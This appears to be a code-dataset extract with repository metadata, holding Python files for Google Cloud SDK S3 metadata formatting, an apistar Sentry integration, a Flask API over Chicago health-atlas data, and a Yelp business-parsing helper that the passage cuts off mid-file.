2020-07-25T01:40:19.000Z
|
# -*- coding: utf-8 -*- #
# Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""S3 API-specific resource subclasses."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import collections
from googlecloudsdk.api_lib.storage import errors
from googlecloudsdk.command_lib.storage.resources import resource_util
_INCOMPLETE_OBJECT_METADATA_WARNING = (
'Use "-j", the JSON flag, to view additional S3 metadata.')
def _json_dump_recursion_helper(metadata):
"""See _get_json_dump docstring."""
if isinstance(metadata, list):
return [_json_dump_recursion_helper(item) for item in metadata]
if not isinstance(metadata, dict):
return resource_util.convert_to_json_parsable_type(metadata)
# Sort by key to make sure dictionary always prints in correct order.
formatted_dict = collections.OrderedDict(sorted(metadata.items()))
for key, value in formatted_dict.items():
if isinstance(value, dict):
# Recursively handle dictionaries.
formatted_dict[key] = _json_dump_recursion_helper(value)
elif isinstance(value, list):
# Recursively handled lists, which may contain more dicts, like ACLs.
formatted_list = [_json_dump_recursion_helper(item) for item in value]
if formatted_list:
# Ignore empty lists.
formatted_dict[key] = formatted_list
elif value or resource_util.should_preserve_falsy_metadata_value(value):
formatted_dict[key] = resource_util.convert_to_json_parsable_type(value)
return formatted_dict
def _get_json_dump(resource):
"""Formats S3 resource metadata as JSON.
Args:
resource (S3BucketResource|S3ObjectResource): Resource object.
Returns:
Formatted JSON string.
"""
return resource_util.configured_json_dumps(
collections.OrderedDict([
('url', resource.storage_url.url_string),
('type', resource.TYPE_STRING),
('metadata', _json_dump_recursion_helper(resource.metadata)),
]))
def _get_error_or_exists_string(value):
"""Returns error if value is error or existence string."""
if isinstance(value, errors.S3ApiError):
return value
else:
return resource_util.get_exists_string(value)
def _get_formatted_acl_section(acl_metadata):
"""Returns formatted ACLs, error, or formatted none value."""
if isinstance(acl_metadata, errors.S3ApiError):
return resource_util.get_padded_metadata_key_value_line('ACL', acl_metadata)
elif acl_metadata:
return resource_util.get_metadata_json_section_string(
'ACL', acl_metadata, _json_dump_recursion_helper)
else:
return resource_util.get_padded_metadata_key_value_line('ACL', '[]')
def _get_full_bucket_metadata_string(resource):
"""Formats S3 resource metadata as string with rows.
Args:
resource (S3BucketResource): Resource with metadata.
Returns:
Formatted multi-line string.
"""
# Hardcoded strings found in Boto docs:
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/s3.html
logging_enabled_value = _get_error_or_exists_string(
resource.metadata['LoggingEnabled'])
website_value = _get_error_or_exists_string(resource.metadata['Website'])
cors_value = _get_error_or_exists_string(resource.metadata['CORSRules'])
encryption_value = _get_error_or_exists_string(
resource.metadata['ServerSideEncryptionConfiguration'])
lifecycle_configuration_value = _get_error_or_exists_string(
resource.metadata['LifecycleConfiguration'])
if isinstance(resource.metadata['Versioning'], errors.S3ApiError):
versioning_enabled_value = resource.metadata['Versioning']
else:
versioning_status = resource.metadata['Versioning'].get('Status')
if versioning_status == 'Enabled':
versioning_enabled_value = True
elif versioning_status == 'Suspended':
versioning_enabled_value = False
else:
versioning_enabled_value = None
if isinstance(resource.metadata['Payer'], errors.S3ApiError):
requester_pays_value = resource.metadata['Payer']
elif resource.metadata['Payer'] == 'Requester':
requester_pays_value = True
elif resource.metadata['Payer'] == 'BucketOwner':
requester_pays_value = False
else:
requester_pays_value = None
return (
'{bucket_url}:\n'
'{location_constraint_line}'
'{versioning_enabled_line}'
'{logging_config_line}'
'{website_config_line}'
'{cors_config_line}'
'{encryption_config_line}'
'{lifecycle_config_line}'
'{requester_pays_line}'
'{acl_section}'
).format(
bucket_url=resource.storage_url.versionless_url_string,
location_constraint_line=resource_util.get_padded_metadata_key_value_line(
'Location Constraint', resource.metadata['LocationConstraint']),
versioning_enabled_line=resource_util.get_padded_metadata_key_value_line(
'Versioning Enabled', versioning_enabled_value),
logging_config_line=resource_util.get_padded_metadata_key_value_line(
'Logging Configuration', logging_enabled_value),
website_config_line=resource_util.get_padded_metadata_key_value_line(
'Website Configuration', website_value),
cors_config_line=resource_util.get_padded_metadata_key_value_line(
'CORS Configuration', cors_value),
encryption_config_line=resource_util.get_padded_metadata_key_value_line(
'Encryption Configuration', encryption_value),
lifecycle_config_line=resource_util.get_padded_metadata_key_value_line(
'Lifecycle Configuration', lifecycle_configuration_value),
requester_pays_line=resource_util.get_padded_metadata_key_value_line(
'Requester Pays Enabled', requester_pays_value),
# Remove ending newline character because this is the last list item.
acl_section=_get_formatted_acl_section(resource.metadata['ACL'])[:-1])
def _get_full_object_metadata_string(resource):
"""Formats S3 resource metadata as string with rows.
Args:
resource (S3ObjectResource): Resource with metadata.
Returns:
Formatted multi-line string.
"""
# Hardcoded strings found in Boto docs:
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/s3.html
if 'LastModified' in resource.metadata:
optional_time_updated_line = resource_util.get_padded_metadata_time_line(
'Update Time', resource.metadata['LastModified'])
else:
optional_time_updated_line = ''
if 'StorageClass' in resource.metadata:
optional_storage_class_line = resource_util.get_padded_metadata_key_value_line(
'Storage Class', resource.metadata['StorageClass'])
else:
optional_storage_class_line = ''
if 'CacheControl' in resource.metadata:
optional_cache_control_line = resource_util.get_padded_metadata_key_value_line(
'Cache-Control', resource.metadata['CacheControl'])
else:
optional_cache_control_line = ''
if 'CacheDisposition' in resource.metadata:
optional_content_disposition_line = resource_util.get_padded_metadata_key_value_line(
'Cache-Disposition', resource.metadata['CacheDisposition'])
else:
optional_content_disposition_line = ''
if 'ContentEncoding' in resource.metadata:
optional_content_encoding_line = resource_util.get_padded_metadata_key_value_line(
'Content-Encoding', resource.metadata['ContentEncoding'])
else:
optional_content_encoding_line = ''
if 'ContentLanguage' in resource.metadata:
optional_content_language_line = resource_util.get_padded_metadata_key_value_line(
'Content-Language', resource.metadata['ContentLanguage'])
else:
optional_content_language_line = ''
if 'PartsCount' in resource.metadata:
optional_component_count_line = (
resource_util.get_padded_metadata_key_value_line(
'Component-Count', resource.metadata['PartsCount']))
else:
optional_component_count_line = ''
if resource.md5_hash is not None:
optional_md5_line = resource_util.get_padded_metadata_key_value_line(
'Hash (MD5)', resource.md5_hash)
elif 'SSECustomerAlgorithm' in resource.metadata:
optional_md5_line = resource_util.get_padded_metadata_key_value_line(
'Hash (MD5)', 'Underlying data encrypted')
else:
optional_md5_line = ''
if 'SSECustomerAlgorithm' in resource.metadata:
optional_encryption_algorithm_line = (
resource_util.get_padded_metadata_key_value_line(
'Encryption Algorithm', resource.metadata['SSECustomerAlgorithm']))
else:
optional_encryption_algorithm_line = ''
if resource.generation:
optional_generation_line = resource_util.get_padded_metadata_key_value_line(
'Generation', resource.generation)
else:
optional_generation_line = ''
return (
'{object_url}:\n'
'{optional_time_updated_line}'
'{optional_storage_class_line}'
'{optional_cache_control_line}'
'{optional_content_disposition_line}'
'{optional_content_encoding_line}'
'{optional_content_language_line}'
'{content_length_line}'
'{content_type_line}'
'{optional_component_count_line}'
'{optional_md5_line}'
'{optional_encryption_algorithm_line}'
'{etag_line}'
'{optional_generation_line}'
'{acl_section}'
' {incomplete_warning}').format(
object_url=resource.storage_url.versionless_url_string,
optional_time_updated_line=optional_time_updated_line,
optional_storage_class_line=optional_storage_class_line,
optional_cache_control_line=optional_cache_control_line,
optional_content_disposition_line=optional_content_disposition_line,
optional_content_encoding_line=optional_content_encoding_line,
optional_content_language_line=optional_content_language_line,
content_length_line=resource_util.get_padded_metadata_key_value_line(
'Content-Length', resource.size),
content_type_line=resource_util.get_padded_metadata_key_value_line(
'Content-Type', resource.metadata.get('ContentType')),
optional_component_count_line=optional_component_count_line,
optional_md5_line=optional_md5_line,
optional_encryption_algorithm_line=optional_encryption_algorithm_line,
etag_line=resource_util.get_padded_metadata_key_value_line(
'ETag', resource.etag),
optional_generation_line=optional_generation_line,
acl_section=_get_formatted_acl_section(resource.metadata.get('ACL')),
incomplete_warning=_INCOMPLETE_OBJECT_METADATA_WARNING)
| 38.716511
| 89
| 0.745735
|
# -*- coding: utf-8 -*- #
# Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""S3 API-specific resource subclasses."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import collections
from googlecloudsdk.api_lib.storage import errors
from googlecloudsdk.command_lib.storage.resources import resource_reference
from googlecloudsdk.command_lib.storage.resources import resource_util
_INCOMPLETE_OBJECT_METADATA_WARNING = (
'Use "-j", the JSON flag, to view additional S3 metadata.')
def _json_dump_recursion_helper(metadata):
"""See _get_json_dump docstring."""
if isinstance(metadata, list):
return [_json_dump_recursion_helper(item) for item in metadata]
if not isinstance(metadata, dict):
return resource_util.convert_to_json_parsable_type(metadata)
# Sort by key to make sure dictionary always prints in correct order.
formatted_dict = collections.OrderedDict(sorted(metadata.items()))
for key, value in formatted_dict.items():
if isinstance(value, dict):
# Recursively handle dictionaries.
formatted_dict[key] = _json_dump_recursion_helper(value)
elif isinstance(value, list):
# Recursively handled lists, which may contain more dicts, like ACLs.
formatted_list = [_json_dump_recursion_helper(item) for item in value]
if formatted_list:
# Ignore empty lists.
formatted_dict[key] = formatted_list
elif value or resource_util.should_preserve_falsy_metadata_value(value):
formatted_dict[key] = resource_util.convert_to_json_parsable_type(value)
return formatted_dict
def _get_json_dump(resource):
"""Formats S3 resource metadata as JSON.
Args:
resource (S3BucketResource|S3ObjectResource): Resource object.
Returns:
Formatted JSON string.
"""
return resource_util.configured_json_dumps(
collections.OrderedDict([
('url', resource.storage_url.url_string),
('type', resource.TYPE_STRING),
('metadata', _json_dump_recursion_helper(resource.metadata)),
]))
def _get_error_or_exists_string(value):
"""Returns error if value is error or existence string."""
if isinstance(value, errors.S3ApiError):
return value
else:
return resource_util.get_exists_string(value)
def _get_formatted_acl_section(acl_metadata):
"""Returns formatted ACLs, error, or formatted none value."""
if isinstance(acl_metadata, errors.S3ApiError):
return resource_util.get_padded_metadata_key_value_line('ACL', acl_metadata)
elif acl_metadata:
return resource_util.get_metadata_json_section_string(
'ACL', acl_metadata, _json_dump_recursion_helper)
else:
return resource_util.get_padded_metadata_key_value_line('ACL', '[]')
def _get_full_bucket_metadata_string(resource):
"""Formats S3 resource metadata as string with rows.
Args:
resource (S3BucketResource): Resource with metadata.
Returns:
Formatted multi-line string.
"""
# Hardcoded strings found in Boto docs:
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/s3.html
logging_enabled_value = _get_error_or_exists_string(
resource.metadata['LoggingEnabled'])
website_value = _get_error_or_exists_string(resource.metadata['Website'])
cors_value = _get_error_or_exists_string(resource.metadata['CORSRules'])
encryption_value = _get_error_or_exists_string(
resource.metadata['ServerSideEncryptionConfiguration'])
lifecycle_configuration_value = _get_error_or_exists_string(
resource.metadata['LifecycleConfiguration'])
if isinstance(resource.metadata['Versioning'], errors.S3ApiError):
versioning_enabled_value = resource.metadata['Versioning']
else:
versioning_status = resource.metadata['Versioning'].get('Status')
if versioning_status == 'Enabled':
versioning_enabled_value = True
elif versioning_status == 'Suspended':
versioning_enabled_value = False
else:
versioning_enabled_value = None
if isinstance(resource.metadata['Payer'], errors.S3ApiError):
requester_pays_value = resource.metadata['Payer']
elif resource.metadata['Payer'] == 'Requester':
requester_pays_value = True
elif resource.metadata['Payer'] == 'BucketOwner':
requester_pays_value = False
else:
requester_pays_value = None
return (
'{bucket_url}:\n'
'{location_constraint_line}'
'{versioning_enabled_line}'
'{logging_config_line}'
'{website_config_line}'
'{cors_config_line}'
'{encryption_config_line}'
'{lifecycle_config_line}'
'{requester_pays_line}'
'{acl_section}'
).format(
bucket_url=resource.storage_url.versionless_url_string,
location_constraint_line=resource_util.get_padded_metadata_key_value_line(
'Location Constraint', resource.metadata['LocationConstraint']),
versioning_enabled_line=resource_util.get_padded_metadata_key_value_line(
'Versioning Enabled', versioning_enabled_value),
logging_config_line=resource_util.get_padded_metadata_key_value_line(
'Logging Configuration', logging_enabled_value),
website_config_line=resource_util.get_padded_metadata_key_value_line(
'Website Configuration', website_value),
cors_config_line=resource_util.get_padded_metadata_key_value_line(
'CORS Configuration', cors_value),
encryption_config_line=resource_util.get_padded_metadata_key_value_line(
'Encryption Configuration', encryption_value),
lifecycle_config_line=resource_util.get_padded_metadata_key_value_line(
'Lifecycle Configuration', lifecycle_configuration_value),
requester_pays_line=resource_util.get_padded_metadata_key_value_line(
'Requester Pays Enabled', requester_pays_value),
# Remove ending newline character because this is the last list item.
acl_section=_get_formatted_acl_section(resource.metadata['ACL'])[:-1])
def _get_full_object_metadata_string(resource):
"""Formats S3 resource metadata as string with rows.
Args:
resource (S3ObjectResource): Resource with metadata.
Returns:
Formatted multi-line string.
"""
# Hardcoded strings found in Boto docs:
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/s3.html
if 'LastModified' in resource.metadata:
optional_time_updated_line = resource_util.get_padded_metadata_time_line(
'Update Time', resource.metadata['LastModified'])
else:
optional_time_updated_line = ''
if 'StorageClass' in resource.metadata:
optional_storage_class_line = resource_util.get_padded_metadata_key_value_line(
'Storage Class', resource.metadata['StorageClass'])
else:
optional_storage_class_line = ''
if 'CacheControl' in resource.metadata:
optional_cache_control_line = resource_util.get_padded_metadata_key_value_line(
'Cache-Control', resource.metadata['CacheControl'])
else:
optional_cache_control_line = ''
if 'CacheDisposition' in resource.metadata:
optional_content_disposition_line = resource_util.get_padded_metadata_key_value_line(
'Cache-Disposition', resource.metadata['CacheDisposition'])
else:
optional_content_disposition_line = ''
if 'ContentEncoding' in resource.metadata:
optional_content_encoding_line = resource_util.get_padded_metadata_key_value_line(
'Content-Encoding', resource.metadata['ContentEncoding'])
else:
optional_content_encoding_line = ''
if 'ContentLanguage' in resource.metadata:
optional_content_language_line = resource_util.get_padded_metadata_key_value_line(
'Content-Language', resource.metadata['ContentLanguage'])
else:
optional_content_language_line = ''
if 'PartsCount' in resource.metadata:
optional_component_count_line = (
resource_util.get_padded_metadata_key_value_line(
'Component-Count', resource.metadata['PartsCount']))
else:
optional_component_count_line = ''
if resource.md5_hash is not None:
optional_md5_line = resource_util.get_padded_metadata_key_value_line(
'Hash (MD5)', resource.md5_hash)
elif 'SSECustomerAlgorithm' in resource.metadata:
optional_md5_line = resource_util.get_padded_metadata_key_value_line(
'Hash (MD5)', 'Underlying data encrypted')
else:
optional_md5_line = ''
if 'SSECustomerAlgorithm' in resource.metadata:
optional_encryption_algorithm_line = (
resource_util.get_padded_metadata_key_value_line(
'Encryption Algorithm', resource.metadata['SSECustomerAlgorithm']))
else:
optional_encryption_algorithm_line = ''
if resource.generation:
optional_generation_line = resource_util.get_padded_metadata_key_value_line(
'Generation', resource.generation)
else:
optional_generation_line = ''
return (
'{object_url}:\n'
'{optional_time_updated_line}'
'{optional_storage_class_line}'
'{optional_cache_control_line}'
'{optional_content_disposition_line}'
'{optional_content_encoding_line}'
'{optional_content_language_line}'
'{content_length_line}'
'{content_type_line}'
'{optional_component_count_line}'
'{optional_md5_line}'
'{optional_encryption_algorithm_line}'
'{etag_line}'
'{optional_generation_line}'
'{acl_section}'
' {incomplete_warning}').format(
object_url=resource.storage_url.versionless_url_string,
optional_time_updated_line=optional_time_updated_line,
optional_storage_class_line=optional_storage_class_line,
optional_cache_control_line=optional_cache_control_line,
optional_content_disposition_line=optional_content_disposition_line,
optional_content_encoding_line=optional_content_encoding_line,
optional_content_language_line=optional_content_language_line,
content_length_line=resource_util.get_padded_metadata_key_value_line(
'Content-Length', resource.size),
content_type_line=resource_util.get_padded_metadata_key_value_line(
'Content-Type', resource.metadata.get('ContentType')),
optional_component_count_line=optional_component_count_line,
optional_md5_line=optional_md5_line,
optional_encryption_algorithm_line=optional_encryption_algorithm_line,
etag_line=resource_util.get_padded_metadata_key_value_line(
'ETag', resource.etag),
optional_generation_line=optional_generation_line,
acl_section=_get_formatted_acl_section(resource.metadata.get('ACL')),
incomplete_warning=_INCOMPLETE_OBJECT_METADATA_WARNING)
class S3BucketResource(resource_reference.BucketResource):
"""API-specific subclass for handling metadata."""
def get_full_metadata_string(self):
return _get_full_bucket_metadata_string(self)
def get_json_dump(self):
return _get_json_dump(self)
class S3ObjectResource(resource_reference.ObjectResource):
"""API-specific subclass for handling metadata."""
def __init__(self,
storage_url_object,
content_type=None,
creation_time=None,
etag=None,
crc32c_hash=None,
md5_hash=None,
metadata=None,
metageneration=None,
size=None):
"""Initializes resource. Args are a subset of attributes."""
super(S3ObjectResource, self).__init__(
storage_url_object,
content_type=content_type,
creation_time=creation_time,
etag=etag,
crc32c_hash=None,
md5_hash=md5_hash,
metadata=metadata,
metageneration=metageneration,
size=size)
def get_full_metadata_string(self):
return _get_full_object_metadata_string(self)
def get_json_dump(self):
return _get_json_dump(self)
| 0
| 0
| 0
| 1,152
| 0
| 0
| 0
| 54
| 68
|
d66df52d49ff61c5175e83fab8cd02546b04169c
| 1,982
|
py
|
Python
|
apistar_sentry.py
|
LeadPages/apistar_sentry
|
f718784b256399ae04f4e8bf82b177f9cc3b1008
|
[
"MIT"
] | 2
|
2018-06-10T14:37:04.000Z
|
2018-06-16T22:33:46.000Z
|
apistar_sentry.py
|
LeadPages/apistar_sentry
|
f718784b256399ae04f4e8bf82b177f9cc3b1008
|
[
"MIT"
] | 3
|
2020-03-24T17:19:55.000Z
|
2021-02-02T22:08:44.000Z
|
apistar_sentry.py
|
LeadPages/apistar_sentry
|
f718784b256399ae04f4e8bf82b177f9cc3b1008
|
[
"MIT"
] | 1
|
2018-04-16T18:44:33.000Z
|
2018-04-16T18:44:33.000Z
|
__version__ = "0.2.0"
| 26.426667
| 72
| 0.590817
|
import typing
from apistar import Settings
from apistar.interfaces import Auth
from apistar.types import ReturnValue
from raven import Client
__version__ = "0.2.0"
class Sentry:
def __init__(self, settings: Settings) -> None:
self.client = Client(
settings["SENTRY_DSN"],
environment=settings["ENVIRONMENT"],
release=settings["VERSION"],
)
@classmethod
def setup(cls, settings: Settings) -> typing.Optional["Sentry"]:
if settings.get("SENTRY_DSN"):
return cls(settings)
return None
@classmethod
def setup_celery(cls, settings: Settings) -> None:
from raven.contrib import celery as raven_celery
sentry = cls(settings)
raven_celery.register_logger_signal(sentry.client)
raven_celery.register_signal(sentry.client)
def track(self, auth: Auth) -> None:
self.client.context.activate()
if auth is not None:
self.client.context.merge({
"user": {
"id": auth.get_user_id(),
"name": auth.get_display_name(),
"authenticated": auth.is_authenticated(),
}
})
def clear(self) -> None:
self.client.context.clear()
def capture_exception(self) -> None:
self.client.captureException()
class SentryMixin:
def exception_handler(self, exc: Exception, sentry: Sentry) -> None:
try:
return super().exception_handler(exc)
except Exception:
if sentry is not None:
try:
sentry.capture_exception()
finally:
sentry.clear()
raise
def before_request(auth: Auth, sentry: Sentry) -> None:
if sentry is not None:
sentry.track(auth)
def after_request(sentry: Sentry, ret: ReturnValue) -> ReturnValue:
if sentry is not None:
sentry.clear()
return ret
| 0
| 398
| 0
| 1,123
| 0
| 199
| 0
| 32
| 203
|
460ed8df205faa3ecff6b37fb600ecfce371a297
| 7,121
|
py
|
Python
|
app.py
|
tanasijevich/project3
|
cd4870727e31bad47868625a59a565f4b96d80a5
|
[
"MIT"
] | null | null | null |
app.py
|
tanasijevich/project3
|
cd4870727e31bad47868625a59a565f4b96d80a5
|
[
"MIT"
] | null | null | null |
app.py
|
tanasijevich/project3
|
cd4870727e31bad47868625a59a565f4b96d80a5
|
[
"MIT"
] | null | null | null |
# import necessary libraries
# from models import create_classes
from sqlalchemy.ext.automap import automap_base
from sqlalchemy import create_engine
from flask import (Flask)
# Read data from csv
#csv_file = "data/Chicago Health Atlas.csv"
#df = pd.read_csv(csv_file)
#df.head()
#df.rename(columns={"VRDIBR_2015-2019":"VRDIBR_2015_2019","VRDIAR_2015-2018":"VRDIAR_2015_2018","VRDTH_2015-2019":"VRDTH_2015_2019","VRCAR_2015-2019":"VRCAR_2015_2019","VRADR_2015-2019":"VRADR_2015_2019","HDX_2015-2019":"HDX_2015_2019"},inplace=True)
#creating sqlite engine to create database
#engine = create_engine('sqlite:///data/Chicago_Health_database.db')
#engine = create_engine('sqlite:///C:/Users/doyel/Desktop/project3_flask_ex1/data/mydatabase.db')
#Table name : Chicago_Health_Atlas
#df.to_sql('Chicago_Health_Atlas',con=engine,if_exists='replace')
#####################################################################
engine = create_engine("sqlite:///data/mydatabase.db")
# reflect an existing database into a new model
Base = automap_base()
# reflect the tables
Base.prepare(engine, reflect=True)
# Save reference to the table
print(Base.classes.keys())
Healthatlas = Base.classes.healthatlas
#Actors = Base.classes.actors
#################################################
# Flask Setup
#################################################
app = Flask(__name__)
# ---------------------------------------------------------
# Web site
# ---------------------------------------------------------
# API to call "when data.html" page is loading with community information table
# API to call when a disease is selectd from list by user in "data.html" page
if __name__ == "__main__":
app.run()
| 42.136095
| 576
| 0.72869
|
# import necessary libraries
# from models import create_classes
import pandas as pd
import os
import sqlalchemy
from sqlalchemy.ext.automap import automap_base
from sqlalchemy.orm import Session
from sqlalchemy import create_engine, func
from sqlite3 import connect
import json
from flask import (
Flask,
render_template,
jsonify,
request,
redirect,
jsonify)
# Read data from csv
#csv_file = "data/Chicago Health Atlas.csv"
#df = pd.read_csv(csv_file)
#df.head()
#df.rename(columns={"VRDIBR_2015-2019":"VRDIBR_2015_2019","VRDIAR_2015-2018":"VRDIAR_2015_2018","VRDTH_2015-2019":"VRDTH_2015_2019","VRCAR_2015-2019":"VRCAR_2015_2019","VRADR_2015-2019":"VRADR_2015_2019","HDX_2015-2019":"HDX_2015_2019"},inplace=True)
#creating sqlite engine to create database
#engine = create_engine('sqlite:///data/Chicago_Health_database.db')
#engine = create_engine('sqlite:///C:/Users/doyel/Desktop/project3_flask_ex1/data/mydatabase.db')
#Table name : Chicago_Health_Atlas
#df.to_sql('Chicago_Health_Atlas',con=engine,if_exists='replace')
#####################################################################
engine = create_engine("sqlite:///data/mydatabase.db")
# reflect an existing database into a new model
Base = automap_base()
# reflect the tables
Base.prepare(engine, reflect=True)
# Save reference to the table
print(Base.classes.keys())
Healthatlas = Base.classes.healthatlas
#Actors = Base.classes.actors
#################################################
# Flask Setup
#################################################
app = Flask(__name__)
# ---------------------------------------------------------
# Web site
@app.route("/")
def home():
return render_template("index.html")
@app.route("/data.html")
def data():
return render_template("data.html")
@app.route("/templates/map.html")
def map():
return render_template("map.html")
@app.route("/templates/d3_chart.html")
def d3_chart():
return render_template("d3_chart.html")
# ---------------------------------------------------------
# API to call "when data.html" page is loading with community information table
@app.route("/api/community")
def community_grid():
session = Session(engine)
results = session.query(Healthatlas.Name,Healthatlas.Median_Household_Income,Healthatlas.Poverty_Rate,Healthatlas.Receiving_Food_Stamps,Healthatlas.Public_Assistance_Income,Healthatlas.High_School_Grad_Rate, Healthatlas.College_Grad_Rate,Healthatlas.Non_Hispanic_White,Healthatlas.Non_Hispanic_Black,Healthatlas.Asian_Pacific_Islander,Healthatlas.Hispanic_or_Latino,Healthatlas.Population_All,Healthatlas.Population_Infants,Healthatlas.Population_Juveniles,Healthatlas.Population_Young_Adults,Healthatlas.Population_Middle_Aged_Adults,Healthatlas.Population_Seniors).all()
#results = session.query(Healthatlas.Name,Healthatlas.GEOID, Healthatlas.Population,Healthatlas.Longitude, Healthatlas.Latitude).all()
#results = pd.read_sql('SELECT Name,GEOID,Population,Longitude,Latitude FROM Chicago_Health_Atlas', engine)
#results = engine.execute("SELECT Name,GEOID,Population,Longitude,Latitude FROM Chicago_Health_Atlas").fetchall()
#session.query(Movies.title, Movies.director, Movies.year, Movies.rating, Movies.imdb_votes, Movies.imdb_score).all()
results = [list(r) for r in results]
table_results = {
"table": results
}
session.close()
return jsonify(table_results)
# API to call when a disease is selectd from list by user in "data.html" page
@app.route("/api/deceases/<decease>")
def deceases(decease):
session = Session(engine)
if decease == "diabetes":
results = session.query(Healthatlas.Name, Healthatlas.Population_All, Healthatlas.Longitude, Healthatlas.Latitude, Healthatlas.VRDIAR_2015_2019, Healthatlas.HDX_2015_2019, Healthatlas.HCSSP_2016_2018, Healthatlas.HCSSMKP_2016_2018).all()
elif decease == "diabetes_related":
results = session.query(Healthatlas.Name, Healthatlas.Population_All, Healthatlas.Longitude, Healthatlas.Latitude, Healthatlas.VRDIBR_2015_2019, Healthatlas.HDX_2015_2019, Healthatlas.HCSSP_2016_2018, Healthatlas.HCSSMKP_2016_2018 ).all()
elif decease == "alzheimer":
results = session.query(Healthatlas.Name, Healthatlas.Population_All, Healthatlas.Longitude, Healthatlas.Latitude, Healthatlas.VRADR_2015_2019, Healthatlas.HDX_2015_2019, Healthatlas.HCSSP_2016_2018, Healthatlas.HCSSMKP_2016_2018).all()
elif decease == "cancer":
results = session.query(Healthatlas.Name, Healthatlas.Population_All, Healthatlas.Longitude, Healthatlas.Latitude, Healthatlas.VRCAR_2015_2019, Healthatlas.HDX_2015_2019, Healthatlas.HCSSP_2016_2018, Healthatlas.HCSSMKP_2016_2018).all()
elif decease == "hypertension":
results = session.query(Healthatlas.Name, Healthatlas.Population_All, Healthatlas.Longitude, Healthatlas.Latitude, Healthatlas.HCSHYTP_2016_2018, Healthatlas.HDX_2015_2019, Healthatlas.HCSSP_2016_2018, Healthatlas.HCSSMKP_2016_2018).all()
elif decease == "adult_obesity":
results = session.query(Healthatlas.Name, Healthatlas.Population_All, Healthatlas.Longitude, Healthatlas.Latitude, Healthatlas.HCSOBP_2016_2018, Healthatlas.HDX_2015_2019, Healthatlas.HCSSP_2016_2018, Healthatlas.HCSSMKP_2016_2018).all()
elif decease == "coronary_heart_disease":
results = session.query(Healthatlas.Name, Healthatlas.Population_All, Healthatlas.Longitude, Healthatlas.Latitude, Healthatlas.VRCHDR_2015_2019, Healthatlas.HDX_2015_2019, Healthatlas.HCSSP_2016_2018, Healthatlas.HCSSMKP_2016_2018).all()
#elif decease == "all" :
# results = session.query(Healthatlas.Name, Healthatlas.Population_All, Healthatlas.Longitude, Healthatlas.Latitude, Healthatlas.VRDTH_2015_2019, Healthatlas.HDX_2015_2019).all()
else:
results = session.query(Healthatlas.Name,Healthatlas.Population_All, Healthatlas.Longitude, Healthatlas.Latitude, Healthatlas.VRADR_2015_2019, Healthatlas.HDX_2015_2019, Healthatlas.HCSSP_2016_2018, Healthatlas.HCSSMKP_2016_2018).all()
results = [list(r) for r in results]
name = [result[4] for result in results]
hardship = [result[5] for result in results]
soda = [result[6] for result in results]
smoke = [result[7] for result in results]
decease_results = {
"decease_name": name,
"hd_index": hardship,
"soda_con":soda,
"smoking":smoke,
}
session.close()
return jsonify(decease_results)
@app.route("/api/geojson")
def map_data():
with open('data/geo.json', 'r') as file:
your_data = json.loads(file.read())
# print(your_data)
return jsonify(your_data)
@app.route('/api/d3_chart/<field_x>/<field_y>')
def d3_chart_api(field_x, field_y):
session = Session(engine)
x_column = getattr(Healthatlas, field_x)
y_column = getattr(Healthatlas, field_y)
results = session.query(x_column, y_column).all()
results = [list(r) for r in results]
session.close()
return jsonify(results)
if __name__ == "__main__":
app.run()
| 0
| 5,028
| 0
| 0
| 0
| 0
| 0
| 76
| 314
|
e202b3b1b0dd6517b189261d661038ca7be2cad9
| 2,377
|
py
|
Python
|
lambda/extract_yelp/extract.py
|
Rdbaker/barfinder
|
63c75dc99f2371371aa8072078175558d1917864
|
[
"BSD-3-Clause"
] | null | null | null |
lambda/extract_yelp/extract.py
|
Rdbaker/barfinder
|
63c75dc99f2371371aa8072078175558d1917864
|
[
"BSD-3-Clause"
] | null | null | null |
lambda/extract_yelp/extract.py
|
Rdbaker/barfinder
|
63c75dc99f2371371aa8072078175558d1917864
|
[
"BSD-3-Clause"
] | null | null | null |
import logging
from models import business as Business
logging.getLogger().setLevel(logging.INFO)
def business_exists(yelp_id, conn):
"""Return True if the business exists."""
return conn.execute(Business.select().where(Business.c.yelp_id == yelp_id))\
.first() is not None
def delete_business(yelp_id, conn):
"""Delete the business with the given yelp id."""
return conn.execute(Business.delete().where(Business.c.yelp_id == yelp_id))
| 32.561644
| 80
| 0.640303
|
import logging
from models import tag as Tag, business as Business, business_tag_join_table
logging.getLogger().setLevel(logging.INFO)
def parse_yelp_business(business):
return {
'source': 'yelp',
'raw_yelp_data': business,
'yelp_id': business.get('id'),
'name': business.get('name', 'UNKNOWN'),
'price': len(business.get('price', '')),
'latitude': business.get('coordinates', {}).get('latitude'),
'longitude': business.get('coordinates', {}).get('longitude'),
'phone': business.get('phone'),
}
def business_exists(yelp_id, conn):
"""Return True if the business exists."""
return conn.execute(Business.select().where(Business.c.yelp_id == yelp_id))\
.first() is not None
def delete_business(yelp_id, conn):
"""Delete the business with the given yelp id."""
return conn.execute(Business.delete().where(Business.c.yelp_id == yelp_id))
def tag_exists(alias, conn):
return conn.execute(Tag.select().where(Tag.c.alias == alias))\
.first() is not None
def create_tag(tag, conn):
conn.execute(Tag.insert().values(**tag))
def get_or_create_tags(tags, conn):
names = []
for tag in tags:
if not tag_exists(tag['alias'], conn):
create_tag(tag, conn)
names.append(tag['alias'])
return conn.execute(Tag.select().where(Tag.c.alias.in_(names))).fetchall()
def create_business(business, conn):
conn.execute(Business.insert().values(**business))
